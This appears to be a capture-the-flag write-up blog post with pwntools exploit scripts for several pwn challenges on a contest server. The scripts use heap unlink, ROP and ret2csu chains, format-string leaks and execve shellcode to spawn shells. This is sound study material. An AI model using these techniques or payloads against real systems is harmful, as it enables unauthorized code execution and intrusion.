
five空间大赛

Whali3n51 发布于 2019-09-01

立雪

from pwn import *
# Full pwntools I/O tracing: every sendlineafter below depends on the menu
# prompt matching exactly, and debug output is the fastest way to see where
# the exchange stalls.
context.log_level = 'debug'
# Local run for debugging: p = process('./pwn15')
p = remote('111.33.164.6', 50015)
def create(size, content):
    """Menu option 1: allocate a note of `size` bytes holding `content`.

    Each answer is sent only once its prompt has arrived so the helper
    stays in step with the remote menu; sendlineafter appends a newline
    to `content`.
    """
    steps = (('Your choice:', '1'),
             ("Length of note:", str(size)),
             ("Content of note:", content))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def edit(index, size, content):
    """Menu option 2: rewrite note `index` with `size` bytes of `content`.

    `size` is sent independently of the note's original allocation, which
    is what the overflow below relies on (a 0xf8-byte note is edited with
    0x100 bytes).
    """
    steps = (('Your choice:', '2'),
             ('Index:', str(index)),
             ('Length of note:', str(size)),
             ('Content of note:', content))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def free(index):
    """Menu option 3: free note `index`."""
    for prompt, answer in (('Your choice:', '3'), ('Index:', str(index))):
        p.sendlineafter(prompt, answer)


# Three 0xf8-byte notes (0x100-byte chunks): note 0 hosts the fake chunk,
# note 1 is freed to trigger backward consolidation, note 2 just holds a
# command string.
create(0xf8, 'aa')            # index 0
create(0xf8, 'bb')            # index 1
create(0xf8, '/bin/sh\x00')   # index 2

# Both addresses are fixed (binary is not PIE, 0x60xxxx .bss/.data):
# the global slot that stores note 0's pointer, and the global the hidden
# menu choice below presumably checks.
chunk0_addr = 0x006020C0
admin = 0x602088

# Classic unlink. A fake free chunk of size 0xf0 starts at note 0's data;
# its fd/bk are chosen so that fd->bk == bk->fd == &note0 (the pointer slot
# at chunk0_addr), which is exactly the check unlink() performs. The last
# 16 bytes spill into note 1's header: prev_size = 0xf0 (the fake size) and
# size = 0x100 with PREV_INUSE clear, so free(1) consolidates backwards and
# unlinks the fake chunk, leaving *chunk0_addr == chunk0_addr - 0x18.
fake_hdr = p64(0) + p64(0xf0) + p64(chunk0_addr - 0x18) + p64(chunk0_addr - 0x10)
fake_pad = 'a' * (0xf8 - 5 * 8)
victim_hdr = p64(0xf0) + p64(0x100)
overflow = fake_hdr + fake_pad + victim_hdr
edit(0, len(overflow), overflow)
# gdb.attach(p)   # useful breakpoint right before the consolidating free
free(1)

# Note 0's pointer now points 0x18 before its own slot, so editing note 0
# rewrites the pointer table: the 4th qword lands on slot 0 and makes it
# alias `admin`. The three 0x100 values overwrite whatever precedes the
# slot (presumably bookkeeping for the notes -- not verified here).
table = p64(0x100) + p64(0x100) + p64(0x100) + p64(admin)
edit(0, len(table), table)
edit(0, len(table), p64(0x7E4))          # write the expected value (0x7E4) into admin
p.sendlineafter('Your choice:', '2019')  # non-menu choice, presumably the guarded win path
p.interactive()

正定

from pwn import *
# Full pwntools I/O tracing so a mismatched menu prompt is obvious.
context.log_level = 'debug'
# Local run for debugging: p = process('./pwn14')
p = remote('111.33.164.6', 50014)
def create(size, content):
    """Menu option 1: allocate a note of `size` bytes holding `content`.

    Note the prompt strings differ slightly from the other challenges
    (trailing spaces); they are reproduced exactly.
    """
    steps = (("Your choice : ", '1'),
             ("Size of note : ", str(size)),
             ("Content of note:", content))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def edit(index, size, content):
    """Menu option 2: rewrite note `index` with `size` bytes of `content`.

    `size` is not tied to the note's allocation, which the overflow below
    exploits (a 0xf8-byte note is edited with 0x100 bytes).
    """
    steps = (("Your choice : ", '2'),
             ("Index :", str(index)),
             ("Size of note : ", str(size)),
             ('Content of note : ', content))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def free(index):
    """Menu option 3: free note `index`."""
    for prompt, answer in (("Your choice : ", '3'), ("Index :", str(index))):
        p.sendlineafter(prompt, answer)


# Same unlink layout as the previous challenge: note 0 hosts the fake
# chunk, note 1 is freed to consolidate backwards into it.
create(0xf8, 'aa')            # index 0
create(0xf8, 'bb')            # index 1
create(0xf8, '/bin/sh\x00')   # index 2
create(0xf8, 'dd')            # index 3
create(0x30, 'ee')            # index 4  (3 and 4 shape the heap; exact reason not visible here)

# Fixed addresses (no PIE, 0x40xxxx): note 0's pointer slot and the global
# that the hidden choice below presumably checks.
chunk0_addr = 0x4040C0
admin = 0x4040A0

# Fake chunk of size 0xf0 at note 0's data with fd/bk satisfying
# fd->bk == bk->fd == &note0; the overflow's last 16 bytes set note 1's
# prev_size to 0xf0 and its size to 0x100 (PREV_INUSE clear) so free(1)
# unlinks the fake chunk and leaves *chunk0_addr == chunk0_addr - 0x18.
fake_hdr = p64(0) + p64(0xf0) + p64(chunk0_addr - 0x18) + p64(chunk0_addr - 0x10)
fake_pad = 'a' * (0xf8 - 5 * 8)
victim_hdr = p64(0xf0) + p64(0x100)
overflow = fake_hdr + fake_pad + victim_hdr
edit(0, len(overflow), overflow)

free(1)

# Editing note 0 now writes over the pointer table; the 4th qword lands on
# slot 0 and points it at `admin`, so the next edit writes into admin.
# The three 0x100 values cover whatever sits 0x18 bytes before the slot
# (presumably note bookkeeping -- not verified here).
table = p64(0x100) + p64(0x100) + p64(0x100) + p64(admin)
edit(0, len(table), table)
edit(0, len(table), p64(0x7E4))          # expected value (0x7E4) into admin
p.sendlineafter("Your choice : ", '70')  # non-menu choice, presumably the guarded win path
p.interactive()

一苇

from pwn import *
#p=process('./pwn13')
p = remote('111.33.164.6', 50013)
p.sendlineafter('your choice:', '1')
# 0x28 bytes of filler reach the saved return address; only its lowest
# byte is then overwritten with 0x50. A one-byte partial overwrite works
# regardless of ASLR because the low 12 bits of an address are never
# randomised -- the intended target is presumably a function in the same
# page as the original return site (not visible here). sendafter is used
# so no trailing newline corrupts the byte after 0x50.
overwrite = 'a' * 0x28 + '\x50'
p.sendafter("input massage\n", overwrite)
p.interactive()

拈花

from pwn import *
context.log_level = 'debug'
# Local variant: p = process("./pwn11") with libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = remote("111.33.164.6", 50011)
libc = ELF("libc-2.19.so")   # libc shipped with the challenge; offsets below come from it
elf = ELF("./pwn11")

puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi_ret = 0x4012ab       # pop rdi ; ret  (fixed: binary is not PIE, 0x40xxxx)
RESTART = 0x401080           # presumably the program entry point, used to rerun it -- confirm

# Stage 1: leak puts' libc address. 40 bytes of filler reach the saved
# return address, then puts(puts@got) and a jump back to the start so the
# overflow can be hit a second time.
p.sendlineafter("please input your name\n", "A")
stage1 = ''.join([
    'A' * 40,
    p64(pop_rdi_ret), p64(puts_got),
    p64(puts_plt),
    p64(RESTART),
])
p.sendline(stage1)
p.recvuntil("ail!\n")        # tail of the message printed just before the leak
leak = u64(p.recv(6).ljust(8, '\x00'))   # 6 significant bytes of a user-space pointer
libc_base = leak - libc.symbols["puts"]
print(hex(libc_base))

# Stage 2: ret2csu. 0x4012A2 / 0x401288 are the two halves of the usual
# __libc_csu_init gadget pair: the first pops rbx, rbp, r12-r15, the second
# loads rdx/rsi/edi from r15/r14/r13 and does call [r12 + rbx*8]. With
# rbx=0, rbp=1, r12=read@got that is read(0, scratch, 0x100); the 56 filler
# bytes absorb the add rsp,8 and six pops that follow the call. (Gadget
# semantics inferred from the standard layout -- verify against the binary.)
p.sendlineafter("please input your name\n", "A")
system_addr = libc.symbols["system"] + libc_base
CSU_POP = 0x4012A2
CSU_CALL = 0x401288
scratch = elf.bss() + 0x100  # writable, fixed-address buffer for the command string
stage2 = ''.join([
    'B' * 40,
    p64(CSU_POP),
    p64(0),                  # rbx
    p64(1),                  # rbp
    p64(elf.got["read"]),    # r12
    p64(0),                  # r13 -> fd 0
    p64(scratch),            # r14 -> buffer
    p64(0x100),              # r15 -> count
    p64(CSU_CALL),
    'B' * 56,
    p64(pop_rdi_ret), p64(scratch),
    p64(system_addr),
])
p.sendline(stage2)
sleep(0.5)                   # let read() be reached before the command arrives
p.sendline("/bin/sh\x00")
p.interactive()

坐忘

from pwn import *
import base64
#p=process("./pwn9")
p = remote("111.33.164.6", "50009")
elf = ELF("./pwn9")
mprotect = elf.symbols["mprotect"]   # resolved from the binary itself (looks statically linked; not verified)

# Stage 1 - canary leak. The server base64-decodes our input into a stack
# buffer and echoes the decoded bytes back. Nine 'A's overwrite the
# canary's terminating low byte (0x00 -> 0x41), so the echo runs on into
# the canary; subtract the 0x41 we planted to recover its real value.
probe = base64.b64encode('A' * 9)
print(probe)
p.recvuntil("welcome to base64 decode server\n")
p.sendlineafter(">\n", probe)
p.recvuntil("decode res:\n")
p.recvuntil('A' * 8)
canary = u64(p.recv(8)) - 0x41
success("canary =====> 0x%x" % canary)

# Gadgets (fixed addresses: no PIE).
pop_rdi = 0x401e36
pop_rsi = 0x401f57
pop_rdx = 0x4433e6
p.recvuntil("continue ?")
p.sendline("y")

bss_addr = elf.bss()
read_addr = elf.symbols["read"]
page = bss_addr & 0xfffffffffffff000   # mprotect requires a page-aligned start


def _call3(fn, rdi, rsi, rdx):
    """ROP fragment: set the three SysV argument registers and call `fn`."""
    return (p64(pop_rdi) + p64(rdi) +
            p64(pop_rsi) + p64(rsi) +
            p64(pop_rdx) + p64(rdx) +
            p64(fn))


# Stage 2 - ROP: make the .bss page RWX, read shellcode into it, jump there.
# Frame layout: 8 bytes of buffer, the canary, 8 bytes of saved rbp.
chain = 'A' * 8 + p64(canary) + 'A' * 8
chain += _call3(mprotect, page, 0x1000, 7)       # PROT_READ|PROT_WRITE|PROT_EXEC
chain += _call3(read_addr, 0, bss_addr, 0x100)   # read(0, bss, 0x100)
chain += p64(bss_addr)                           # return into the freshly read shellcode
encoded = base64.b64encode(chain)
print(encoded)

p.sendlineafter(">\n", encoded)
p.sendlineafter("continue ?", "no")
# 24-byte x86-64 execve("//bin/sh", ["//bin/sh", NULL], NULL): syscall 0x3b,
# rdx zeroed via cdq, string and argv built on the stack.
shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
sleep(1)                                         # give the chain time to reach read()
p.sendline(shellcode)
p.interactive()

玄冥

from pwn import *
context.log_level = 'debug'
# Local variant: p = process('./pwn') with libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = remote('111.33.164.6', 50007)
libc = ELF('./libc-2.19.so')   # challenge libc; the puts/system offsets below come from it
def create(size):
    """Menu option 1: allocate a note of `size` bytes (no content prompt)."""
    for prompt, answer in (("choice >>", '1'), ("size:", str(size))):
        p.sendlineafter(prompt, answer)
def edit(index, size, content):
    """Menu option 3: overwrite note `index` with `size` bytes of `content`.

    Unlike the numeric prompts, the data is sent with sendafter (no
    trailing newline) so exactly `content` reaches the program; callers
    below pass `size` one larger than the data length.
    """
    p.sendlineafter("choice >>", '3')
    p.sendlineafter("id:", str(index))
    p.sendlineafter('size:', str(size))
    p.sendafter('content:', content)
def free(index):
    """Menu option 4: free note `index`."""
    for prompt, answer in (('choice >>', '4'), ("id:", str(index))):
        p.sendlineafter(prompt, answer)


def show(index):
    """Menu option 2: print note `index` (the caller reads the output)."""
    for prompt, answer in (("choice >>", '2'), ("id:", str(index))):
        p.sendlineafter(prompt, answer)


create(0xf8)   # index 0: hosts the fake chunk
create(0xf8)   # index 1: freed to consolidate backwards into the fake chunk
create(0xf8)   # index 2: later filled with the command string

chunk0_addr = 0x006020E0   # global slot holding note 0's pointer (no PIE)
target = 0x0602020         # GOT entry read below and compared against puts' offset -- presumably puts@got

# Unlink: fake chunk of size 0xf0 at note 0's data with fd/bk such that
# fd->bk == bk->fd == &note0; the overflow's last 16 bytes set note 1's
# prev_size to 0xf0 and its size to 0x100 (PREV_INUSE clear), so free(1)
# unlinks the fake chunk and leaves *chunk0_addr == chunk0_addr - 0x18.
fake = (p64(0) + p64(0xf0) +
        p64(chunk0_addr - 0x18) + p64(chunk0_addr - 0x10) +
        'a' * (0xf8 - 5 * 8) +
        p64(0xf0) + p64(0x100))
edit(0, len(fake) + 1, fake)
free(1)

# Editing note 0 now writes from 0x18 before the table: the 4th qword sets
# slot 0 to `target`, the 5th sets slot 1 to `target - 8`.
table = p64(target) * 4 + p64(target - 0x8)
edit(0, len(table) + 1, table)
show(0)

p.recvuntil('Your data:')
leaked = u64(p.recv(6).ljust(8, '\x00'))
log.success('free_addr====>0x%x' % leaked)
libc_base = leaked - libc.symbols['puts']   # the leak is treated as puts' address (log label says "free")
log.success('libc_base====>0x%x' % libc_base)
system_addr = libc_base + libc.symbols['system']
# Slot 1 aliases target-8 (presumably free@got, given that free(2) below is
# expected to run system): overwrite it with system, then free a note
# holding "/bin/sh".
edit(1, len(p64(system_addr)) + 1, p64(system_addr))
edit(2, 9, '/bin/sh\x00')
free(2)
p.interactive()

於讴

from pwn import *

context.log_level = 'debug'
p = remote('111.33.164.4', 50006)
# Local variant: p = process('./pwn') with libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./pwn')
libc = ELF('libc-2.19.so')       # challenge libc; every offset below is relative to it

main_addr = 0x04007C3            # return here after the leak to get a second overflow
put_plt = elf.plt['puts']
start_got = elf.got['__libc_start_main']
poprdi = 0x414fc3                # pop rdi ; ret
start_libc = libc.symbols['__libc_start_main']


def _overflow(chain):
    """Reach the vulnerable write and send `chain` after 24 bytes of filler.

    '-1' is the input that makes the program hand out the overflowing
    write; the exact check it defeats is not visible in this script.
    """
    p.sendline('-1')
    p.recvuntil('OH, WHY ARE YOU SO GOOD?\n')
    p.sendline('a' * 24 + chain)


# Round 1: puts(__libc_start_main@got), then back to main.
_overflow(p64(poprdi) + p64(start_got) + p64(put_plt) + p64(main_addr))
start_addr = u64(p.recv(6).ljust(8, '\x00'))
print(hex(start_addr))
libc_base = start_addr - start_libc
print(hex(libc_base))

# Round 2: system("/bin/sh"). 0x1633e8 is a hard-coded offset of "/bin/sh"
# inside libc-2.19.so; next(libc.search("/bin/sh")) would derive it from
# the file instead of trusting the constant.
bin_sh = 0x1633e8
system_off = libc.symbols["system"]
bin_addr = bin_sh + libc_base
system_addr = system_off + libc_base
print(hex(bin_addr))
print(hex(system_addr))
_overflow(p64(poprdi) + p64(bin_addr) + p64(system_addr))
p.interactive()

副墨

from pwn import *
#p=process("./bf")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
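p = remote("111.33.164.6", 50001)
elf = ELF("./bf")                 # PIE binary: every address below is base_addr + offset

# Ten answers that satisfy the guessing game (presumably a predictably
# seeded RNG; the values must have come from a local run).
GUESSES = [7427, 39356, 9595, 54062, 67371, 42578, 92585, 76990, 22615, 53318]


def _leak_to_int(raw):
    """Convert a `%p` leak such as '0x7ffc...' into an int.

    The original used eval() on bytes received from the remote service,
    which lets a malicious or compromised endpoint run arbitrary Python
    on the attacker's own machine. int(raw, 16) accepts the same '0x...'
    form and simply raises ValueError on anything else (e.g. '(nil)').
    """
    return int(raw.strip(), 16)


def _play(fmt):
    """Start a game with format string `fmt` as the name and win it.

    The name field is padded to 28 bytes and NUL-terminated with p32(0);
    the ten guesses are answered from GUESSES and the function returns
    once "Correct!" has been consumed, so the caller's next recv() gets
    the format-string output.
    """
    p.sendlineafter("Are you sure want to play the game?\n", "1")
    name = fmt.ljust(28, 'A') + p32(0)
    p.sendafter("Input your name : \n", name)
    for guess in GUESSES:
        p.recvuntil("Now guess:")
        p.sendline(str(guess))
    p.recvuntil("Correct!\n")


# Round 1: %17$p -> stack canary, %26$p -> an address inside the binary
# located 0x970 past the load base (presumably a return address into the
# game loop; jumping back to it restarts the game for round 2).
_play('%17$p%26$p')
canary = _leak_to_int(p.recv(18))              # "0x" + 16 hex digits
success("canary ==> 0x%x" % canary)
base_addr = _leak_to_int(p.recv(14)) - 0x970   # "0x" + 12 hex digits
success("base_addr ==> 0x%x" % base_addr)
pop_rdi_ret = base_addr + 0xdb3                # pop rdi ; ret

# Frame layout (from the overflow): 52 bytes of buffer, canary, 8 bytes saved rbp.
restart = 'A' * 52 + p64(canary) + 'A' * 8 + p64(base_addr + 0x970)
p.sendline(restart)

# Round 2: %19$p -> a libc address; 240 is the usual distance of that
# return address from __libc_start_main on glibc 2.23. Logged only: the
# final chain uses system@plt from the binary and never needs libc.
_play('%19$p')
libc_start_main = _leak_to_int(p.recv(14)) - 240
success("libc_start_main ==> 0x%x" % libc_start_main)

# ret2csu: 0xDAA pops rbx, rbp, r12-r15 and 0xD90 loads the argument
# registers from r13/r14/r15 and does call [r12 + rbx*8]; with r12 =
# read@got this is read(0, scratch, 0x100). (Register-to-argument
# mapping inferred from the values passed -- confirm against the binary.)
system_plt = base_addr + elf.plt["system"]
csu_pop = base_addr + 0xDAA
csu_call = base_addr + 0xD90
read_got = base_addr + elf.got["read"]
scratch = base_addr + elf.bss()

chain = 'A' * 52 + p64(canary) + 'A' * 8
chain += p64(csu_pop)
chain += p64(0)              # rbx
chain += p64(1)              # rbp
chain += p64(read_got)       # r12
chain += p64(0x100)          # r13
chain += p64(scratch)        # r14
chain += p64(0)              # r15
chain += p64(csu_call)
chain += 'A' * 56            # add rsp,8 plus six pops after the call
chain += p64(pop_rdi_ret) + p64(scratch)
chain += p64(system_plt)
p.recv()                     # drain whatever the game printed before the overflow
p.sendline(chain)
sleep(0.2)                   # let read() start before the command is sent
p.sendline("/bin/sh\x00")
p.interactive()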
  • #stack_overflow
  • #unlink
